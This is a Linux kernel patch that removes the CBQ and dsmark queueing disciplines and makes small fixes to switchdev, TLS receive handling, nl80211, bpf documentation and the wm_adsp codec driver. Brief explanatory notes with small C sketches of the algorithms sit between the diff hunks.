+-	.dump_stats	=	cbq_dump_stats,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init cbq_module_init(void)
+-{
+-	return register_qdisc(&cbq_qdisc_ops);
+-}
+-static void __exit cbq_module_exit(void)
+-{
+-	unregister_qdisc(&cbq_qdisc_ops);
+-}
+-module_init(cbq_module_init)
+-module_exit(cbq_module_exit)
+-MODULE_LICENSE("GPL");
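
For readers skimming the removed scheduler: the heart of cbq_update() above is a fixed-point EWMA of per-class idle time, kept scaled by 1/W so that the update needs no division. A minimal standalone sketch of that arithmetic follows (plain userspace C; the function and variable names are illustrative, not kernel API):

    #include <stdio.h>

    /* Scaled EWMA as in the removed cbq_update():
     *   true_avgidle := (1-W)*true_avgidle + W*idle,  W = 2^-ewma_log.
     * Storing avgidle = true_avgidle/W turns the update into a shift:
     *   avgidle += idle - (avgidle >> ewma_log)
     */
    static long ewma_update(long avgidle, long idle, unsigned int ewma_log)
    {
        return avgidle + idle - (avgidle >> ewma_log);
    }

    int main(void)
    {
        long avgidle = 0;
        int i;

        /* With a constant idle time of 100, the scaled average
         * converges to idle << ewma_log = 100 * 32 = 3200.
         */
        for (i = 0; i < 200; i++)
            avgidle = ewma_update(avgidle, 100, 5);
        printf("scaled avgidle = %ld\n", avgidle);
        return 0;
    }

A negative avgidle marks an overlimit class, which is exactly the branch where cbq_update() computed undertime.
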
+diff --git a/net/sched/sch_dsmark.c b/net/sched/sch_dsmark.c
+deleted file mode 100644
+index 401ffaf87d622..0000000000000
+--- a/net/sched/sch_dsmark.c
++++ /dev/null
+@@ -1,518 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-only
+-/* net/sched/sch_dsmark.c - Differentiated Services field marker */
+-
+-/* Written 1998-2000 by Werner Almesberger, EPFL ICA */
+-
+-
+-#include <linux/module.h>
+-#include <linux/init.h>
+-#include <linux/slab.h>
+-#include <linux/types.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <linux/rtnetlink.h>
+-#include <linux/bitops.h>
+-#include <net/pkt_sched.h>
+-#include <net/pkt_cls.h>
+-#include <net/dsfield.h>
+-#include <net/inet_ecn.h>
+-#include <asm/byteorder.h>
+-
+-/*
+- * classid	class		marking
+- * -------	-----		-------
+- *   n/a	  0		n/a
+- *   x:0	  1		use entry [0]
+- *   ...	 ...		...
+- *   x:y y>0	 y+1		use entry [y]
+- *   ...	 ...		...
+- * x:indices-1	indices		use entry [indices-1]
+- *   ...	 ...		...
+- *   x:y	 y+1		use entry [y & (indices-1)]
+- *   ...	 ...		...
+- * 0xffff	0x10000		use entry [indices-1]
+- */
+-
+-
+-#define NO_DEFAULT_INDEX	(1 << 16)
+-
+-struct mask_value {
+-	u8			mask;
+-	u8			value;
+-};
+-
+-struct dsmark_qdisc_data {
+-	struct Qdisc		*q;
+-	struct tcf_proto __rcu	*filter_list;
+-	struct tcf_block	*block;
+-	struct mask_value	*mv;
+-	u16			indices;
+-	u8			set_tc_index;
+-	u32			default_index;	/* index range is 0...0xffff */
+-#define DSMARK_EMBEDDED_SZ	16
+-	struct mask_value	embedded[DSMARK_EMBEDDED_SZ];
+-};
+-
+-static inline int dsmark_valid_index(struct dsmark_qdisc_data *p, u16 index)
+-{
+-	return index <= p->indices && index > 0;
+-}
+-
+-/* ------------------------- Class/flow operations ------------------------- */
+-
+-static int dsmark_graft(struct Qdisc *sch, unsigned long arg,
+-			struct Qdisc *new, struct Qdisc **old,
+-			struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p],new %p,old %p)\n",
+-		 __func__, sch, p, new, old);
+-
+-	if (new == NULL) {
+-		new = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops,
+-					sch->handle, NULL);
+-		if (new == NULL)
+-			new = &noop_qdisc;
+-	}
+-
+-	*old = qdisc_replace(sch, new, &p->q);
+-	return 0;
+-}
+-
+-static struct Qdisc *dsmark_leaf(struct Qdisc *sch, unsigned long arg)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	return p->q;
+-}
+-
+-static unsigned long dsmark_find(struct Qdisc *sch, u32 classid)
+-{
+-	return TC_H_MIN(classid) + 1;
+-}
+-
+-static unsigned long dsmark_bind_filter(struct Qdisc *sch,
+-					unsigned long parent, u32 classid)
+-{
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x)\n",
+-		 __func__, sch, qdisc_priv(sch), classid);
+-
+-	return dsmark_find(sch, classid);
+-}
+-
+-static void dsmark_unbind_filter(struct Qdisc *sch, unsigned long cl)
+-{
+-}
+-
+-static const struct nla_policy dsmark_policy[TCA_DSMARK_MAX + 1] = {
+-	[TCA_DSMARK_INDICES]		= { .type = NLA_U16 },
+-	[TCA_DSMARK_DEFAULT_INDEX]	= { .type = NLA_U16 },
+-	[TCA_DSMARK_SET_TC_INDEX]	= { .type = NLA_FLAG },
+-	[TCA_DSMARK_MASK]		= { .type = NLA_U8 },
+-	[TCA_DSMARK_VALUE]		= { .type = NLA_U8 },
+-};
+-
+-static int dsmark_change(struct Qdisc *sch, u32 classid, u32 parent,
+-			 struct nlattr **tca, unsigned long *arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_DSMARK_MAX + 1];
+-	int err = -EINVAL;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],classid %x,parent %x), arg 0x%lx\n",
+-		 __func__, sch, p, classid, parent, *arg);
+-
+-	if (!dsmark_valid_index(p, *arg)) {
+-		err = -ENOENT;
+-		goto errout;
+-	}
+-
+-	if (!opt)
+-		goto errout;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_DSMARK_MAX, opt,
+-					  dsmark_policy, NULL);
+-	if (err < 0)
+-		goto errout;
+-
+-	if (tb[TCA_DSMARK_VALUE])
+-		p->mv[*arg - 1].value = nla_get_u8(tb[TCA_DSMARK_VALUE]);
+-
+-	if (tb[TCA_DSMARK_MASK])
+-		p->mv[*arg - 1].mask = nla_get_u8(tb[TCA_DSMARK_MASK]);
+-
+-	err = 0;
+-
+-errout:
+-	return err;
+-}
+-
+-static int dsmark_delete(struct Qdisc *sch, unsigned long arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	if (!dsmark_valid_index(p, arg))
+-		return -EINVAL;
+-
+-	p->mv[arg - 1].mask = 0xff;
+-	p->mv[arg - 1].value = 0;
+-
+-	return 0;
+-}
+-
+-static void dsmark_walk(struct Qdisc *sch, struct qdisc_walker *walker)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	int i;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],walker %p)\n",
+-		 __func__, sch, p, walker);
+-
+-	if (walker->stop)
+-		return;
+-
+-	for (i = 0; i < p->indices; i++) {
+-		if (p->mv[i].mask == 0xff && !p->mv[i].value) {
+-			walker->count++;
+-			continue;
+-		}
+-		if (!tc_qdisc_stats_dump(sch, i + 1, walker))
+-			break;
+-	}
+-}
+-
+-static struct tcf_block *dsmark_tcf_block(struct Qdisc *sch, unsigned long cl,
+-					  struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	return p->block;
+-}
+-
+-/* --------------------------- Qdisc operations ---------------------------- */
+-
+-static int dsmark_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+-			  struct sk_buff **to_free)
+-{
+-	unsigned int len = qdisc_pkt_len(skb);
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	int err;
+-
+-	pr_debug("%s(skb %p,sch %p,[qdisc %p])\n", __func__, skb, sch, p);
+-
+-	if (p->set_tc_index) {
+-		int wlen = skb_network_offset(skb);
+-
+-		switch (skb_protocol(skb, true)) {
+-		case htons(ETH_P_IP):
+-			wlen += sizeof(struct iphdr);
+-			if (!pskb_may_pull(skb, wlen) ||
+-			    skb_try_make_writable(skb, wlen))
+-				goto drop;
+-
+-			skb->tc_index = ipv4_get_dsfield(ip_hdr(skb))
+-				& ~INET_ECN_MASK;
+-			break;
+-
+-		case htons(ETH_P_IPV6):
+-			wlen += sizeof(struct ipv6hdr);
+-			if (!pskb_may_pull(skb, wlen) ||
+-			    skb_try_make_writable(skb, wlen))
+-				goto drop;
+-
+-			skb->tc_index = ipv6_get_dsfield(ipv6_hdr(skb))
+-				& ~INET_ECN_MASK;
+-			break;
+-		default:
+-			skb->tc_index = 0;
+-			break;
+-		}
+-	}
+-
+-	if (TC_H_MAJ(skb->priority) == sch->handle)
+-		skb->tc_index = TC_H_MIN(skb->priority);
+-	else {
+-		struct tcf_result res;
+-		struct tcf_proto *fl = rcu_dereference_bh(p->filter_list);
+-		int result = tcf_classify(skb, NULL, fl, &res, false);
+-
+-		pr_debug("result %d class 0x%04x\n", result, res.classid);
+-
+-		switch (result) {
+-#ifdef CONFIG_NET_CLS_ACT
+-		case TC_ACT_QUEUED:
+-		case TC_ACT_STOLEN:
+-		case TC_ACT_TRAP:
+-			__qdisc_drop(skb, to_free);
+-			return NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+-
+-		case TC_ACT_SHOT:
+-			goto drop;
+-#endif
+-		case TC_ACT_OK:
+-			skb->tc_index = TC_H_MIN(res.classid);
+-			break;
+-
+-		default:
+-			if (p->default_index != NO_DEFAULT_INDEX)
+-				skb->tc_index = p->default_index;
+-			break;
+-		}
+-	}
+-
+-	err = qdisc_enqueue(skb, p->q, to_free);
+-	if (err != NET_XMIT_SUCCESS) {
+-		if (net_xmit_drop_count(err))
+-			qdisc_qstats_drop(sch);
+-		return err;
+-	}
+-
+-	sch->qstats.backlog += len;
+-	sch->q.qlen++;
+-
+-	return NET_XMIT_SUCCESS;
+-
+-drop:
+-	qdisc_drop(skb, sch, to_free);
+-	return NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-}
+-
+-static struct sk_buff *dsmark_dequeue(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct sk_buff *skb;
+-	u32 index;
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-
+-	skb = qdisc_dequeue_peeked(p->q);
+-	if (skb == NULL)
+-		return NULL;
+-
+-	qdisc_bstats_update(sch, skb);
+-	qdisc_qstats_backlog_dec(sch, skb);
+-	sch->q.qlen--;
+-
+-	index = skb->tc_index & (p->indices - 1);
+-	pr_debug("index %d->%d\n", skb->tc_index, index);
+-
+-	switch (skb_protocol(skb, true)) {
+-	case htons(ETH_P_IP):
+-		ipv4_change_dsfield(ip_hdr(skb), p->mv[index].mask,
+-				    p->mv[index].value);
+-		break;
+-	case htons(ETH_P_IPV6):
+-		ipv6_change_dsfield(ipv6_hdr(skb), p->mv[index].mask,
+-				    p->mv[index].value);
+-		break;
+-	default:
+-		/*
+-		 * Only complain if a change was actually attempted.
+-		 * This way, we can send non-IP traffic through dsmark
+-		 * and don't need yet another qdisc as a bypass.
+-		 */
+-		if (p->mv[index].mask != 0xff || p->mv[index].value)
+-			pr_warn("%s: unsupported protocol %d\n",
+-				__func__, ntohs(skb_protocol(skb, true)));
+-		break;
+-	}
+-
+-	return skb;
+-}
+-
+-static struct sk_buff *dsmark_peek(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-
+-	return p->q->ops->peek(p->q);
+-}
+-
+-static int dsmark_init(struct Qdisc *sch, struct nlattr *opt,
+-		       struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *tb[TCA_DSMARK_MAX + 1];
+-	int err = -EINVAL;
+-	u32 default_index = NO_DEFAULT_INDEX;
+-	u16 indices;
+-	int i;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],opt %p)\n", __func__, sch, p, opt);
+-
+-	if (!opt)
+-		goto errout;
+-
+-	err = tcf_block_get(&p->block, &p->filter_list, sch, extack);
+-	if (err)
+-		return err;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_DSMARK_MAX, opt,
+-					  dsmark_policy, NULL);
+-	if (err < 0)
+-		goto errout;
+-
+-	err = -EINVAL;
+-	if (!tb[TCA_DSMARK_INDICES])
+-		goto errout;
+-	indices = nla_get_u16(tb[TCA_DSMARK_INDICES]);
+-
+-	if (hweight32(indices) != 1)
+-		goto errout;
+-
+-	if (tb[TCA_DSMARK_DEFAULT_INDEX])
+-		default_index = nla_get_u16(tb[TCA_DSMARK_DEFAULT_INDEX]);
+-
+-	if (indices <= DSMARK_EMBEDDED_SZ)
+-		p->mv = p->embedded;
+-	else
+-		p->mv = kmalloc_array(indices, sizeof(*p->mv), GFP_KERNEL);
+-	if (!p->mv) {
+-		err = -ENOMEM;
+-		goto errout;
+-	}
+-	for (i = 0; i < indices; i++) {
+-		p->mv[i].mask = 0xff;
+-		p->mv[i].value = 0;
+-	}
+-	p->indices = indices;
+-	p->default_index = default_index;
+-	p->set_tc_index = nla_get_flag(tb[TCA_DSMARK_SET_TC_INDEX]);
+-
+-	p->q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops, sch->handle,
+-				 NULL);
+-	if (p->q == NULL)
+-		p->q = &noop_qdisc;
+-	else
+-		qdisc_hash_add(p->q, true);
+-
+-	pr_debug("%s: qdisc %p\n", __func__, p->q);
+-
+-	err = 0;
+-errout:
+-	return err;
+-}
+-
+-static void dsmark_reset(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-	if (p->q)
+-		qdisc_reset(p->q);
+-}
+-
+-static void dsmark_destroy(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-
+-	tcf_block_put(p->block);
+-	qdisc_put(p->q);
+-	if (p->mv != p->embedded)
+-		kfree(p->mv);
+-}
+-
+-static int dsmark_dump_class(struct Qdisc *sch, unsigned long cl,
+-			     struct sk_buff *skb, struct tcmsg *tcm)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *opts = NULL;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],class %ld\n", __func__, sch, p, cl);
+-
+-	if (!dsmark_valid_index(p, cl))
+-		return -EINVAL;
+-
+-	tcm->tcm_handle = TC_H_MAKE(TC_H_MAJ(sch->handle), cl - 1);
+-	tcm->tcm_info = p->q->handle;
+-
+-	opts = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (opts == NULL)
+-		goto nla_put_failure;
+-	if (nla_put_u8(skb, TCA_DSMARK_MASK, p->mv[cl - 1].mask) ||
+-	    nla_put_u8(skb, TCA_DSMARK_VALUE, p->mv[cl - 1].value))
+-		goto nla_put_failure;
+-
+-	return nla_nest_end(skb, opts);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, opts);
+-	return -EMSGSIZE;
+-}
+-
+-static int dsmark_dump(struct Qdisc *sch, struct sk_buff *skb)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *opts = NULL;
+-
+-	opts = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (opts == NULL)
+-		goto nla_put_failure;
+-	if (nla_put_u16(skb, TCA_DSMARK_INDICES, p->indices))
+-		goto nla_put_failure;
+-
+-	if (p->default_index != NO_DEFAULT_INDEX &&
+-	    nla_put_u16(skb, TCA_DSMARK_DEFAULT_INDEX, p->default_index))
+-		goto nla_put_failure;
+-
+-	if (p->set_tc_index &&
+-	    nla_put_flag(skb, TCA_DSMARK_SET_TC_INDEX))
+-		goto nla_put_failure;
+-
+-	return nla_nest_end(skb, opts);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, opts);
+-	return -EMSGSIZE;
+-}
+-
+-static const struct Qdisc_class_ops dsmark_class_ops = {
+-	.graft		=	dsmark_graft,
+-	.leaf		=	dsmark_leaf,
+-	.find		=	dsmark_find,
+-	.change		=	dsmark_change,
+-	.delete		=	dsmark_delete,
+-	.walk		=	dsmark_walk,
+-	.tcf_block	=	dsmark_tcf_block,
+-	.bind_tcf	=	dsmark_bind_filter,
+-	.unbind_tcf	=	dsmark_unbind_filter,
+-	.dump		=	dsmark_dump_class,
+-};
+-
+-static struct Qdisc_ops dsmark_qdisc_ops __read_mostly = {
+-	.next		=	NULL,
+-	.cl_ops		=	&dsmark_class_ops,
+-	.id		=	"dsmark",
+-	.priv_size	=	sizeof(struct dsmark_qdisc_data),
+-	.enqueue	=	dsmark_enqueue,
+-	.dequeue	=	dsmark_dequeue,
+-	.peek		=	dsmark_peek,
+-	.init		=	dsmark_init,
+-	.reset		=	dsmark_reset,
+-	.destroy	=	dsmark_destroy,
+-	.change		=	NULL,
+-	.dump		=	dsmark_dump,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init dsmark_module_init(void)
+-{
+-	return register_qdisc(&dsmark_qdisc_ops);
+-}
+-
+-static void __exit dsmark_module_exit(void)
+-{
+-	unregister_qdisc(&dsmark_qdisc_ops);
+-}
+-
+-module_init(dsmark_module_init)
+-module_exit(dsmark_module_exit)
+-
+-MODULE_LICENSE("GPL");
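
The dsmark qdisc removed above rewrote the IP DS field on dequeue with a per-class (mask, value) pair. The rewrite rule itself is one line; here is a self-contained sketch (illustrative userspace C, hypothetical names):

    #include <stdint.h>
    #include <stdio.h>

    /* dsmark-style remark: keep the bits selected by mask, then OR in
     * the configured value. mask 0xff with value 0 is a no-op, which is
     * why the removed dequeue path only warned when that was not the case.
     */
    static uint8_t remark_dsfield(uint8_t dsfield, uint8_t mask, uint8_t value)
    {
        return (dsfield & mask) | value;
    }

    int main(void)
    {
        /* Set DSCP to EF (0x2e << 2) while preserving the two ECN bits. */
        uint8_t tos = 0x13;
        uint8_t out = remark_dsfield(tos, 0x03, 0x2e << 2);

        printf("0x%02x -> 0x%02x\n", tos, out);
        return 0;
    }
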
+diff --git a/net/switchdev/switchdev.c b/net/switchdev/switchdev.c
+index 8cc42aea19c7e..2e14d4c37e2dc 100644
+--- a/net/switchdev/switchdev.c
++++ b/net/switchdev/switchdev.c
+@@ -19,6 +19,35 @@
+ #include <linux/rtnetlink.h>
+ #include <net/switchdev.h>
+ 
++static bool switchdev_obj_eq(const struct switchdev_obj *a,
++			     const struct switchdev_obj *b)
++{
++	const struct switchdev_obj_port_vlan *va, *vb;
++	const struct switchdev_obj_port_mdb *ma, *mb;
++
++	if (a->id != b->id || a->orig_dev != b->orig_dev)
++		return false;
++
++	switch (a->id) {
++	case SWITCHDEV_OBJ_ID_PORT_VLAN:
++		va = SWITCHDEV_OBJ_PORT_VLAN(a);
++		vb = SWITCHDEV_OBJ_PORT_VLAN(b);
++		return va->flags == vb->flags &&
++			va->vid == vb->vid &&
++			va->changed == vb->changed;
++	case SWITCHDEV_OBJ_ID_PORT_MDB:
++	case SWITCHDEV_OBJ_ID_HOST_MDB:
++		ma = SWITCHDEV_OBJ_PORT_MDB(a);
++		mb = SWITCHDEV_OBJ_PORT_MDB(b);
++		return ma->vid == mb->vid &&
++			ether_addr_equal(ma->addr, mb->addr);
++	default:
++		break;
++	}
++
++	BUG();
++}
++
+ static LIST_HEAD(deferred);
+ static DEFINE_SPINLOCK(deferred_lock);
+ 
+@@ -307,6 +336,50 @@ int switchdev_port_obj_del(struct net_device *dev,
+ }
+ EXPORT_SYMBOL_GPL(switchdev_port_obj_del);
+ 
++/**
++ *	switchdev_port_obj_act_is_deferred - Is object action pending?
++ *
++ *	@dev: port device
++ *	@nt: type of action; add or delete
++ *	@obj: object to test
++ *
++ *	Returns true if a deferred item equivalent to performing
++ *	action @nt on object @obj is pending.
++ *
++ *	rtnl_lock must be held.
++ */
++bool switchdev_port_obj_act_is_deferred(struct net_device *dev,
++					enum switchdev_notifier_type nt,
++					const struct switchdev_obj *obj)
++{
++	struct switchdev_deferred_item *dfitem;
++	bool found = false;
++
++	ASSERT_RTNL();
++
++	spin_lock_bh(&deferred_lock);
++
++	list_for_each_entry(dfitem, &deferred, list) {
++		if (dfitem->dev != dev)
++			continue;
++
++		if ((dfitem->func == switchdev_port_obj_add_deferred &&
++		     nt == SWITCHDEV_PORT_OBJ_ADD) ||
++		    (dfitem->func == switchdev_port_obj_del_deferred &&
++		     nt == SWITCHDEV_PORT_OBJ_DEL)) {
++			if (switchdev_obj_eq((const void *)dfitem->data, obj)) {
++				found = true;
++				break;
++			}
++		}
++	}
++
++	spin_unlock_bh(&deferred_lock);
++
++	return found;
++}
++EXPORT_SYMBOL_GPL(switchdev_port_obj_act_is_deferred);
++
+ static ATOMIC_NOTIFIER_HEAD(switchdev_notif_chain);
+ static BLOCKING_NOTIFIER_HEAD(switchdev_blocking_notif_chain);
+ 
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 80b42a3e78830..6b7189a520af7 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -1098,7 +1098,7 @@ static u16 tls_user_config(struct tls_context *ctx, bool tx)
+ 	return 0;
+ }
+ 
+-static int tls_get_info(const struct sock *sk, struct sk_buff *skb)
++static int tls_get_info(struct sock *sk, struct sk_buff *skb)
+ {
+ 	u16 version, cipher_type;
+ 	struct tls_context *ctx;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index c8cbdd02a784e..93e1bfa72d791 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -1845,7 +1845,8 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 			   u8 *control,
+ 			   size_t skip,
+ 			   size_t len,
+-			   bool is_peek)
++			   bool is_peek,
++			   bool *more)
+ {
+ 	struct sk_buff *skb = skb_peek(&ctx->rx_list);
+ 	struct tls_msg *tlm;
+@@ -1858,7 +1859,7 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 
+ 		err = tls_record_content_type(msg, tlm, control);
+ 		if (err <= 0)
+-			goto out;
++			goto more;
+ 
+ 		if (skip < rxm->full_len)
+ 			break;
+@@ -1876,12 +1877,12 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 
+ 		err = tls_record_content_type(msg, tlm, control);
+ 		if (err <= 0)
+-			goto out;
++			goto more;
+ 
+ 		err = skb_copy_datagram_msg(skb, rxm->offset + skip,
+ 					    msg, chunk);
+ 		if (err < 0)
+-			goto out;
++			goto more;
+ 
+ 		len = len - chunk;
+ 		copied = copied + chunk;
+@@ -1917,6 +1918,10 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 
+ out:
+ 	return copied ? : err;
++more:
++	if (more)
++		*more = true;
++	goto out;
+ }
+ 
+ static bool
+@@ -2020,6 +2025,7 @@ int tls_sw_recvmsg(struct sock *sk,
+ 	int target, err;
+ 	bool is_kvec = iov_iter_is_kvec(&msg->msg_iter);
+ 	bool is_peek = flags & MSG_PEEK;
++	bool rx_more = false;
+ 	bool released = true;
+ 	bool bpf_strp_enabled;
+ 	bool zc_capable;
+@@ -2039,12 +2045,12 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		goto end;
+ 
+ 	/* Process pending decrypted records. It must be non-zero-copy */
+-	err = process_rx_list(ctx, msg, &control, 0, len, is_peek);
++	err = process_rx_list(ctx, msg, &control, 0, len, is_peek, &rx_more);
+ 	if (err < 0)
+ 		goto end;
+ 
+ 	copied = err;
+-	if (len <= copied)
++	if (len <= copied || (copied && control != TLS_RECORD_TYPE_DATA) || rx_more)
+ 		goto end;
+ 
+ 	target = sock_rcvlowat(sk, flags & MSG_WAITALL, len);
+@@ -2137,6 +2143,8 @@ int tls_sw_recvmsg(struct sock *sk,
+ 				decrypted += chunk;
+ 				len -= chunk;
+ 				__skb_queue_tail(&ctx->rx_list, skb);
++				if (unlikely(control != TLS_RECORD_TYPE_DATA))
++					break;
+ 				continue;
+ 			}
+ 
+@@ -2201,10 +2209,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		/* Drain records from the rx_list & copy if required */
+ 		if (is_peek || is_kvec)
+ 			err = process_rx_list(ctx, msg, &control, copied,
+-					      decrypted, is_peek);
++					      decrypted, is_peek, NULL);
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+-					      async_copy_bytes, is_peek);
++					      async_copy_bytes, is_peek, NULL);
+ 	}
+ 
+ 	copied += decrypted;
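
The tls_sw.c change threads a new out-parameter through process_rx_list(): besides the byte count, the function now reports whether it stopped early, on an error or at a record-type boundary, so the caller will not keep reading past a control record. A reduced sketch of that out-parameter pattern (illustrative C, hypothetical names):

    #include <stdbool.h>
    #include <stddef.h>
    #include <stdio.h>

    struct rec { int type; int len; };

    /* Copy the leading records of the wanted type, the way
     * process_rx_list() drains rx_list. When we stop because a
     * different record type is next, report it through *more so the
     * caller does not keep reading in this call.
     */
    static int drain(const struct rec *q, size_t n, int want, bool *more)
    {
        size_t i;
        int copied = 0;

        for (i = 0; i < n; i++) {
            if (q[i].type != want) {
                if (more)
                    *more = true;
                break;
            }
            copied += q[i].len;
        }
        return copied;
    }

    int main(void)
    {
        const struct rec q[] = { { 1, 100 }, { 1, 50 }, { 2, 10 } };
        bool more = false;

        printf("copied=%d more=%d\n", drain(q, 3, 1, &more), (int)more);
        return 0;
    }
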
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 70fb14b8bab07..c259d3227a9e2 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -3960,6 +3960,7 @@ static int nl80211_dump_interface(struct sk_buff *skb, struct netlink_callback *
+ 			if_idx++;
+ 		}
+ 
++		if_start = 0;
+ 		wp_idx++;
+ 	}
+  out:
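
The one-line nl80211 fix is a classic nested-iteration resume bug: a dump resuming at outer index wp_idx with inner offset if_start must clear the inner offset once the first, partially dumped, outer entry is finished, or every later wiphy silently skips its first if_start interfaces. The corrected loop shape in miniature (hypothetical names):

    #include <stdio.h>

    #define OUTER 3
    #define INNER 4

    /* Resume a two-level dump at (wp_start, if_start). Note the reset
     * of if_start after each outer iteration: without it, wiphys after
     * the first would wrongly skip their leading interfaces.
     */
    static void dump_from(int wp_start, int if_start)
    {
        int wp_idx, if_idx;

        for (wp_idx = wp_start; wp_idx < OUTER; wp_idx++) {
            for (if_idx = if_start; if_idx < INNER; if_idx++)
                printf("wiphy %d, iface %d\n", wp_idx, if_idx);
            if_start = 0;  /* the fix: only the first wiphy resumes mid-list */
        }
    }

    int main(void)
    {
        dump_from(1, 2);
        return 0;
    }
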
+diff --git a/scripts/bpf_doc.py b/scripts/bpf_doc.py
+index d5c389df6045e..4de98b7bbea95 100755
+--- a/scripts/bpf_doc.py
++++ b/scripts/bpf_doc.py
+@@ -495,7 +495,7 @@ eBPF programs can have an associated license, passed along with the bytecode
+ instructions to the kernel when the programs are loaded. The format for that
+ string is identical to the one in use for kernel modules (Dual licenses, such
+ as "Dual BSD/GPL", may be used). Some helper functions are only accessible to
+-programs that are compatible with the GNU Privacy License (GPL).
++programs that are compatible with the GNU General Public License (GNU GPL).
+ 
+ In order to use such helpers, the eBPF program must be loaded with the correct
+ license string passed (via **attr**) to the **bpf**\ () system call, and this
+diff --git a/sound/soc/codecs/wm_adsp.c b/sound/soc/codecs/wm_adsp.c
+index 2cfca78f0401f..47a4c363227cc 100644
+--- a/sound/soc/codecs/wm_adsp.c
++++ b/sound/soc/codecs/wm_adsp.c
+@@ -740,19 +740,25 @@ static int wm_adsp_request_firmware_file(struct wm_adsp *dsp,
+ 					 const char *filetype)
+ {
+ 	struct cs_dsp *cs_dsp = &dsp->cs_dsp;
++	const char *fwf;
+ 	char *s, c;
+ 	int ret = 0;
+ 
++	if (dsp->fwf_name)
++		fwf = dsp->fwf_name;
++	else
++		fwf = dsp->cs_dsp.name;
++
+ 	if (system_name && asoc_component_prefix)
+ 		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s-%s-%s.%s", dir, dsp->part,
+-				      dsp->fwf_name, wm_adsp_fw[dsp->fw].file, system_name,
++				      fwf, wm_adsp_fw[dsp->fw].file, system_name,
+ 				      asoc_component_prefix, filetype);
+ 	else if (system_name)
+ 		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s-%s.%s", dir, dsp->part,
+-				      dsp->fwf_name, wm_adsp_fw[dsp->fw].file, system_name,
++				      fwf, wm_adsp_fw[dsp->fw].file, system_name,
+ 				      filetype);
+ 	else
+-		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s.%s", dir, dsp->part, dsp->fwf_name,
++		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s.%s", dir, dsp->part, fwf,
+ 				      wm_adsp_fw[dsp->fw].file, filetype);
+ 
+ 	if (*filename == NULL)
+@@ -842,29 +848,18 @@ static int wm_adsp_request_firmware_files(struct wm_adsp *dsp,
+ 	}
+ 
+ 	adsp_err(dsp, "Failed to request firmware <%s>%s-%s-%s<-%s<%s>>.wmfw\n",
+-		 cirrus_dir, dsp->part, dsp->fwf_name, wm_adsp_fw[dsp->fw].file,
+-		 system_name, asoc_component_prefix);
++		 cirrus_dir, dsp->part,
++		 dsp->fwf_name ? dsp->fwf_name : dsp->cs_dsp.name,
++		 wm_adsp_fw[dsp->fw].file, system_name, asoc_component_prefix);
+ 
+ 	return -ENOENT;
+ }
+ 
+ static int wm_adsp_common_init(struct wm_adsp *dsp)
+ {
+-	char *p;
+-
